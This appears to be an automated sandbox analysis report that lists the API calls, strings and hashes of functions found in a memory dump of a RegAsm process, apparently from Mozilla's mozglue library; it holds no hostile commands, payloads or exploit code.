Instruction ID: 9b5271f104442810ddf0229c9d70bc192469bf21a5a9cc4ec267f86f13df3a17
Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction Fuzzy Hash: 17A117B2E001168FDB14CF68CC90799B7B2EF85314F5502B9C959EB785D730AD9ACB90

Function 6C1377A0 Relevance: 6.3, APIs: 4, Instructions: 291timeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C137A81
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C137A93

Part of subcall function 6C105C50: GetTickCount64.KERNEL32 ref: 6C105D40
Part of subcall function 6C105C50: EnterCriticalSection.KERNEL32(6C16F688), ref: 6C105D67

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C137AA1

Part of subcall function 6C105C50: __aulldiv.LIBCMT ref: 6C105DB4
Part of subcall function 6C105C50: LeaveCriticalSection.KERNEL32(6C16F688), ref: 6C105DED

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C137B31

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
String ID:
API String ID: 4054851604-0
Opcode ID: e74f77a8597402269551d875277da6208745a317fc1ecc2210460557bc331986
Instruction ID: 6ba41c6635745d7d81f0f45b8ead26c2c4d98cb695a4bf975042115973a5d97d
Opcode Fuzzy Hash: e74f77a8597402269551d875277da6208745a317fc1ecc2210460557bc331986
Instruction Fuzzy Hash: 80B18C356083A0CBCB14CE24C55075FB7E2AFC931CF155A1DE999A7B90DB70E90ACB82

Function 6C14B700 Relevance: 4.5, APIs: 3, Instructions: 41nativeCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL ref: 6C14B720
RtlNtStatusToDosError.NTDLL ref: 6C14B75A
RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,00000000,00000000,?,0000001C,6C11FE3F,00000000,00000000,?,?,00000000,?,6C11FE3F), ref: 6C14B760

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Error$LastMemoryQueryStatusVirtualWin32
String ID:
API String ID: 304294125-0
Opcode ID: 6d85136299953afef910a9543d1344d7aae5ab20ee36b63841e352745728810c
Instruction ID: 7d843c065294caa01f95feffcc67a734e4aab1fa320a2c973e4f7cd5af7ee216
Opcode Fuzzy Hash: 6d85136299953afef910a9543d1344d7aae5ab20ee36b63841e352745728810c
Instruction Fuzzy Hash: 79F0AFB0A0420CAEEF019BA5CC84BEEB7BD9B0831AF509239E511656C0D7789598C660

Function 6C14B8C0 Relevance: 3.1, APIs: 2, Instructions: 118nativeCOMMON

Download Yara Rule

APIs

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C0F03D4,?), ref: 6C14B955
NtQueryVirtualMemory.NTDLL ref: 6C14B9A5

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: MemoryQueryVirtualrand_s
String ID:
API String ID: 1889792194-0
Opcode ID: 3de1de142c95a3f856051a2b36f66153ae27cfe89058c94a658fcc85d1d3f302
Instruction ID: 566bc6dda74f16b6e36323a2d02d7cafae6c0f391b34a63ef28658ff7efc65a8
Opcode Fuzzy Hash: 3de1de142c95a3f856051a2b36f66153ae27cfe89058c94a658fcc85d1d3f302
Instruction Fuzzy Hash: AB41D671F016199FDF04CFA9D890ADEB7B6EF88314F248139E515A7704DB30A945CB90

Function 6C1455F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6C11E1A5), ref: 6C145606
LoadLibraryW.KERNEL32(gdi32,?,6C11E1A5), ref: 6C14560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C145633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C14563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C14566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C14567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C145696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C1456B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C1456CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C1456E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C1456FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C145716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C14572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C145748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C145761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C14577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C145793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C1457A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C1457BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C1457D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C1457EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C1457FF

Strings

EnableNonClientDpiScaling, xrefs: 6C145666
user32, xrefs: 6C145601
gdi32, xrefs: 6C14560A
CreateWindowExW, xrefs: 6C1456C5
ShowWindow, xrefs: 6C1456DE
CreateSolidBrush, xrefs: 6C1457E4
AreDpiAwarenessContextsEqual, xrefs: 6C145637
DeleteObject, xrefs: 6C1457F9
GetSystemMetricsForDpi, xrefs: 6C145677
SetWindowPos, xrefs: 6C1456F7
ReleaseDC, xrefs: 6C145742
RegisterClassW, xrefs: 6C1456AC
GetDpiForWindow, xrefs: 6C145690
LoadIconW, xrefs: 6C14575B
MonitorFromWindow, xrefs: 6C14578D
SetWindowLongPtrW, xrefs: 6C1457B7
GetMonitorInfoW, xrefs: 6C1457A2
LoadCursorW, xrefs: 6C145774
FillRect, xrefs: 6C145729
GetThreadDpiAwarenessContext, xrefs: 6C14562D
StretchDIBits, xrefs: 6C1457CC
GetWindowDC, xrefs: 6C145710

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: f01edce503a571349eeac646deca84ff135cedc83d4ffc7f673408720757faa4
Instruction ID: 287ea0d19c73ce590dae102af297f579bc8d6e9a9451489ad20a07932385fd07
Opcode Fuzzy Hash: f01edce503a571349eeac646deca84ff135cedc83d4ffc7f673408720757faa4
Instruction Fuzzy Hash: 9151F3B57117179BDB019F378D58A363AF8AB17349710842AB931E2A52FF74CC20AF61

Function 6C12CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C0F582D), ref: 6C12CC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C0F582D), ref: 6C12CC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C15FE98,?,?,?,?,?,6C0F582D), ref: 6C12CC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C0F582D), ref: 6C12CC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C0F582D), ref: 6C12CC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C0F582D), ref: 6C12CC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0F582D), ref: 6C12CCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C12CCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C12CCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C12CCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C12CCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C12CD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C12CD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C12CD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C12CDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C12CDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C12CDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C12CDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C12CE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C12CE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C12CE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C12CE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C12CE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C12CE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C12CE8A

Strings

nostacksampling, xrefs: 6C12CD7C
jsallocations, xrefs: 6C12CD0E
notimerresolutionchange, xrefs: 6C12CE00
java, xrefs: 6C12CC37
markersallthreads, xrefs: 6C12CE42
noiostacks, xrefs: 6C12CCBE
stackwalk, xrefs: 6C12CCF8
leaf, xrefs: 6C12CC66
seqstyle, xrefs: 6C12CCE6
nativeallocations, xrefs: 6C12CDA8
preferencereads, xrefs: 6C12CD92
Unrecognized feature "%s"., xrefs: 6C12CEA0
power, xrefs: 6C12CE84
cpuallthreads, xrefs: 6C12CE16
screenshots, xrefs: 6C12CCD4
default, xrefs: 6C12CC21
unregisteredthreads, xrefs: 6C12CE58
mainthreadio, xrefs: 6C12CC7C
fileioall, xrefs: 6C12CCA8
samplingallthreads, xrefs: 6C12CE2C
processcpu, xrefs: 6C12CE6E
fileio, xrefs: 6C12CC92
ipcmessages, xrefs: 6C12CDBE
audiocallbacktracing, xrefs: 6C12CDD4

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: 2ceeac816acdcf087f908e2562310589136ccc0e6d507f487f92393cddf76c0d
Instruction ID: 030f5aa3e98c2c766368d7c44e0ead7ec777948de9214b9d275ff3bdf8c192a3
Opcode Fuzzy Hash: 2ceeac816acdcf087f908e2562310589136ccc0e6d507f487f92393cddf76c0d
Instruction Fuzzy Hash: AE51FBC9A4522D12FB0035156D34BAA1409EF6725EF50443AEF29A1F81FF0DD2A9C6F7

Function 6C0F47C0 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 232threadCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C0F4801
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C0F4817
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C0F482D
__Init_thread_footer.LIBCMT ref: 6C0F484A

Part of subcall function 6C11AB3F: EnterCriticalSection.KERNEL32(6C16E370,?,?,6C0E3527,6C16F6CC,?,?,?,?,?,?,?,?,6C0E3284), ref: 6C11AB49
Part of subcall function 6C11AB3F: LeaveCriticalSection.KERNEL32(6C16E370,?,6C0E3527,6C16F6CC,?,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C11AB7C

GetCurrentThreadId.KERNEL32 ref: 6C0F485F
GetCurrentThreadId.KERNEL32 ref: 6C0F487E
AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C0F488B
free.MOZGLUE(?), ref: 6C0F493A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0F4956
free.MOZGLUE(00000000), ref: 6C0F4960
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C0F499A

Part of subcall function 6C11AB89: EnterCriticalSection.KERNEL32(6C16E370,?,?,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284), ref: 6C11AB94
Part of subcall function 6C11AB89: LeaveCriticalSection.KERNEL32(6C16E370,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C11ABD1

free.MOZGLUE(?), ref: 6C0F49C6
free.MOZGLUE(?), ref: 6C0F49E9

Part of subcall function 6C105E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C105EDB
Part of subcall function 6C105E90: memset.VCRUNTIME140(6C147765,000000E5,55CCCCCC), ref: 6C105F27
Part of subcall function 6C105E90: LeaveCriticalSection.KERNEL32(?), ref: 6C105FB2

Strings

MOZ_PROFILER_SHUTDOWN, xrefs: 6C0F4A42
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C0F4812
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C0F4828
[I %d/%d] profiler_shutdown, xrefs: 6C0F4A06
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C0F47FC

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
API String ID: 1340022502-4194431170
Opcode ID: 9f9d9e8f02ae9a5230d9f3dfb2538d5ccaf023d3c95c61e9f2d9901a88c14add
Instruction ID: 68d192ef7d5b9b782fd0788811cb40144cd49f521bbc8d90025f0fc1567ad823
Opcode Fuzzy Hash: 9f9d9e8f02ae9a5230d9f3dfb2538d5ccaf023d3c95c61e9f2d9901a88c14add
Instruction Fuzzy Hash: B7814774B04100ABDB00DFA9CA4876E33F1AF42318F140225ED3297F41E731E996DB96

Function 6C0F19A0 Relevance: 44.2, APIs: 24, Strings: 1, Instructions: 407COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C16F760), ref: 6C0F19BD
GetCurrentProcess.KERNEL32 ref: 6C0F19E5
GetLastError.KERNEL32 ref: 6C0F1A27
moz_xmalloc.MOZGLUE(?), ref: 6C0F1A41
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C0F1A4F
GetLastError.KERNEL32 ref: 6C0F1A92
moz_xmalloc.MOZGLUE(?), ref: 6C0F1AAC
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C0F1ABA
LocalFree.KERNEL32(?), ref: 6C0F1C69
free.MOZGLUE(?), ref: 6C0F1C8F
free.MOZGLUE(?), ref: 6C0F1C9D
CloseHandle.KERNEL32(?), ref: 6C0F1CAE
ReleaseSRWLockExclusive.KERNEL32(6C16F760), ref: 6C0F1D52
GetLastError.KERNEL32 ref: 6C0F1DA5
GetLastError.KERNEL32 ref: 6C0F1DFB
GetLastError.KERNEL32 ref: 6C0F1E49
GetLastError.KERNEL32 ref: 6C0F1E68
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0F1E9B

Part of subcall function 6C0F2070: LoadLibraryW.KERNEL32(combase.dll,6C0F1C5F), ref: 6C0F20AE
Part of subcall function 6C0F2070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C0F20CD
Part of subcall function 6C0F2070: __Init_thread_footer.LIBCMT ref: 6C0F20E1

memset.VCRUNTIME140(?,00000000,00000110), ref: 6C0F1F15
VerSetConditionMask.NTDLL ref: 6C0F1F46
VerSetConditionMask.NTDLL ref: 6C0F1F52
VerSetConditionMask.NTDLL ref: 6C0F1F59
VerSetConditionMask.NTDLL ref: 6C0F1F60
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C0F1F6D

Strings

D, xrefs: 6C0F1B57

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
String ID: D
API String ID: 290179723-2746444292
Opcode ID: 15e54d9b55a7a1deb7e63f0e0484e38664dcf1f908f623ef88be036c4cf9ece4
Instruction ID: 9e54dc1d1c38775ffa3a169c21d8288be62848351afc634a6855fb0ba4aa607f
Opcode Fuzzy Hash: 15e54d9b55a7a1deb7e63f0e0484e38664dcf1f908f623ef88be036c4cf9ece4
Instruction Fuzzy Hash: 20F181B1A00325AFEB209F65CC48BAAB7F4FF49704F104199E915A7640E774EE91DFA0

Function 6C0F4470 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0F4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C0F44B2,6C16E21C,6C16F7F8), ref: 6C0F473E
Part of subcall function 6C0F4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C0F474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C0F44BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C0F44D2
InitOnceExecuteOnce.KERNEL32(6C16F80C,6C0EF240,?,?), ref: 6C0F451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C0F455C
LoadLibraryW.KERNEL32(?), ref: 6C0F4592
InitializeCriticalSection.KERNEL32(6C16F770), ref: 6C0F45A2
moz_xmalloc.MOZGLUE(00000008), ref: 6C0F45AA
moz_xmalloc.MOZGLUE(00000018), ref: 6C0F45BB
InitOnceExecuteOnce.KERNEL32(6C16F818,6C0EF240,?,?), ref: 6C0F4612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C0F4636
LoadLibraryW.KERNEL32(user32.dll), ref: 6C0F4644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C0F466D
VerSetConditionMask.NTDLL ref: 6C0F469F
VerSetConditionMask.NTDLL ref: 6C0F46AB
VerSetConditionMask.NTDLL ref: 6C0F46B2
VerSetConditionMask.NTDLL ref: 6C0F46B9
VerSetConditionMask.NTDLL ref: 6C0F46C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C0F46CD
GetModuleHandleW.KERNEL32(00000000), ref: 6C0F46F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C0F46FD

Strings

NativeNtBlockSet_Write, xrefs: 6C0F46F7
user32.dll, xrefs: 6C0F4557, 6C0F463F
WRusr.dll, xrefs: 6C0F44B5
l, xrefs: 6C0F4578
kernel32.dll, xrefs: 6C0F44CD

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-3894940629
Opcode ID: a11742af9047068b13614056fc6dac90ae5f56b9b37718089dfca686c50d35d9
Instruction ID: 20084878193e5d99107c1f5330dc4cc900f026a28bafd739f102f432ec8459dc
Opcode Fuzzy Hash: a11742af9047068b13614056fc6dac90ae5f56b9b37718089dfca686c50d35d9
Instruction Fuzzy Hash: FD612AB0604344AFEB10DFA2CD09BA977F8EF4630CF048198ED249BA41D7B09A96DF51

Function 6C10BB80 Relevance: 37.1, APIs: 17, Strings: 4, Instructions: 388stringCOMMON

Download Yara Rule

APIs

strchr.VCRUNTIME140(00000000,0000002E), ref: 6C10BC5A
strchr.VCRUNTIME140(00000001,0000002E), ref: 6C10BC6E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(accelerator.dll,?), ref: 6C10BC9E
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C10BE33
VerSetConditionMask.NTDLL ref: 6C10BE65
VerSetConditionMask.NTDLL ref: 6C10BE71
VerSetConditionMask.NTDLL ref: 6C10BE7D
VerSetConditionMask.NTDLL ref: 6C10BE89
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C10BE97
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C10BEE4
VerSetConditionMask.NTDLL ref: 6C10BF15
VerSetConditionMask.NTDLL ref: 6C10BF21
VerSetConditionMask.NTDLL ref: 6C10BF2D
VerSetConditionMask.NTDLL ref: 6C10BF39
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C10BF47

Part of subcall function 6C14AAE0: GetCurrentThreadId.KERNEL32 ref: 6C14AAF8
Part of subcall function 6C14AAE0: EnterCriticalSection.KERNEL32(6C16F770,?,6C10BF9F), ref: 6C14AB08
Part of subcall function 6C14AAE0: LeaveCriticalSection.KERNEL32(6C16F770,?,?,?,?,?,?,?,?,6C10BF9F), ref: 6C14AB6B

free.MOZGLUE(00000000), ref: 6C10BFF0
_strtoui64.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000010), ref: 6C10C014

Part of subcall function 6C14AC20: CreateFileW.KERNEL32 ref: 6C14AC52
Part of subcall function 6C14AC20: CreateFileMappingW.KERNEL32 ref: 6C14AC7D
Part of subcall function 6C14AC20: GetSystemInfo.KERNEL32 ref: 6C14AC98
Part of subcall function 6C14AC20: MapViewOfFile.KERNEL32 ref: 6C14ACB0
Part of subcall function 6C14AC20: GetSystemInfo.KERNEL32 ref: 6C14ACCD
Part of subcall function 6C14AC20: MapViewOfFile.KERNEL32 ref: 6C14AD05
Part of subcall function 6C14AC20: UnmapViewOfFile.KERNEL32 ref: 6C14AD1C
Part of subcall function 6C14AC20: CloseHandle.KERNEL32 ref: 6C14AD28
Part of subcall function 6C14AC20: UnmapViewOfFile.KERNEL32 ref: 6C14AD37
Part of subcall function 6C14AC20: CloseHandle.KERNEL32 ref: 6C14AD43

Part of subcall function 6C14AE70: GetCurrentThreadId.KERNEL32 ref: 6C14AE85
Part of subcall function 6C14AE70: EnterCriticalSection.KERNEL32(6C16F770,?,6C10C034), ref: 6C14AE96
Part of subcall function 6C14AE70: LeaveCriticalSection.KERNEL32(6C16F770,?,?,?,?,6C10C034), ref: 6C14AEBD

Strings

accelerator.dll, xrefs: 6C10BC8E, 6C10BC9D
LdrLoadDll: Ignoring the REDIRECT_TO_NOOP_ENTRYPOINT flag, xrefs: 6C10BF5B
LdrLoadDll: Blocking load of '%s' (SearchPathW didn't find it?), xrefs: 6C10BFCF
LdrLoadDll: Blocking load of '%s' -- see http://www.mozilla.com/en-US/blocklist/, xrefs: 6C10BDDD

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

